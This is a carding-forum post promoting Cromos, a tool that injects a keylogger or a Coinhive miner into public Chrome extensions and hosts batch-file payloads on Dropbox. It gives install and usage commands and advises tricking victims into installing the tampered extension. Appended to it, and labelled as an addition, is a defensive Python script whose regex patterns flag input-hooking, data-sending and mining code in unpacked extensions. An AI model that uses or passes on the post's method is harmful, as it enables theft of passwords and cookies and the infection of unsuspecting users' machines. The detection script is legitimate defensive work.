CarderPlanet
Hi. Today I want to talk about another hacking method. I will tell you about Cromos.
But what is it?
Cromos is a utility for modifying Chrome extensions and injecting your code into them. It also allows you to create your own executables and host files in Dropbox.
Thus, we can inject our code into any extension that is in Google. How can you take advantage of this? We can take any extension that is public, for example, introduce a stealer, and use social engineering to force the victim to install it: "Install this extension, it will snow on your page." This is an example; you can come up with something of your own and use any other extension. 90% of hacking success. 10% - I can't establish the stupidity of the victim ala, etc.
Functionality:
· Download extension
· Code injection
· Uploading files to Dropbox
· Infection of OS of the Windows family
Installation:
Code:
git clone https://github.com/fbctf/cromos
cd cromos
pip install -r requirements.txt
python setup.py
Help:
Code:
./cromos.py -h
How to use:
· Download the extension we need from the market, first defining its ID.
Code:
python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb
· Load the extension and add the keylogger module to it.
Code:
python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger
· Create a batch file and upload it to Dropbox:
Code:
python cromos.py --extension {id} --build {bat} --token {dropboxToken}
Modules:
· Modules / keylogger - This module remembers passwords entered in an infected browser, whether over HTTPS or not. To do this, you need to have a PHP server to receive the email data, passwords, cookies and userAgent.
· Modules / currency - Very cool thing. Mining cryptocurrencies. True, you need a Coinhive account.
Below I will post a link to a video in which the developers themselves tell you how to use the tool:
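A defender-side triage check for the kind of repackaged extension described in this post, as an added example that is not part of the original post or of the Cromos project: it reads an unpacked extension's manifest.json and flags content scripts injected into every site that both hook keyboard or form input and make outbound requests, plus any Coinhive reference. The regexes, the function names and the sample extension are assumptions constructed for illustration, and a match is a reason to review the file by hand, not proof of tampering.

```python
import json, re, tempfile
from pathlib import Path, PurePosixPath

# Heuristics chosen for this example (assumptions, not an exhaustive rule set).
BROAD = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
INPUT_HOOK = re.compile(r"keydown|keypress|keyup|type=.password|['\"]submit['\"]")
NET_SEND = re.compile(r"XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image")
MINER = re.compile(r"coinhive", re.I)


def audit_extension(ext_dir):
    """Return sorted findings for one unpacked extension directory."""
    root = Path(ext_dir)
    manifest = json.loads((root / "manifest.json").read_text(encoding="utf-8-sig"))
    # Content-script files that Chrome injects into every page the user visits.
    everywhere = set()
    for cs in manifest.get("content_scripts", []):
        if BROAD & set(cs.get("matches", [])):
            everywhere.update(PurePosixPath(p.lstrip("/")).as_posix() for p in cs.get("js", []))
    findings = set()
    for js in root.rglob("*.js"):
        rel = js.relative_to(root).as_posix()
        src = js.read_text(encoding="utf-8", errors="replace")
        if MINER.search(src):
            findings.add(f"{rel}: references Coinhive")
        # Input capture plus an outbound request in a script that runs on all sites.
        if rel in everywhere and INPUT_HOOK.search(src) and NET_SEND.search(src):
            findings.add(f"{rel}: all-sites script hooks input and sends data out")
    return sorted(findings)


def build_sample(root, tampered):
    """Write a constructed sample extension (not a real one) under root."""
    root = Path(root)
    scripts = ["snow.js", "extra.js"] if tampered else ["snow.js"]
    manifest = {"manifest_version": 2, "name": "Snow (constructed sample)", "version": "1.0",
                "content_scripts": [{"matches": ["<all_urls>"], "js": scripts}]}
    (root / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
    (root / "snow.js").write_text("document.body.classList.add('snow');", encoding="utf-8")
    if tampered:
        # Inert marker strings only: enough to trip the regexes, not working code.
        (root / "extra.js").write_text("// keydown ... XMLHttpRequest ... coinhive", encoding="utf-8")
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as bad:
        print(audit_extension(build_sample(clean, False)))  # no findings
        print(audit_extension(build_sample(bad, True)))     # two findings for extra.js
```

To audit a real install, call `audit_extension()` on a version directory under the browser profile's Extensions folder and compare any flagged file against a fresh copy of the same extension version from the store.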
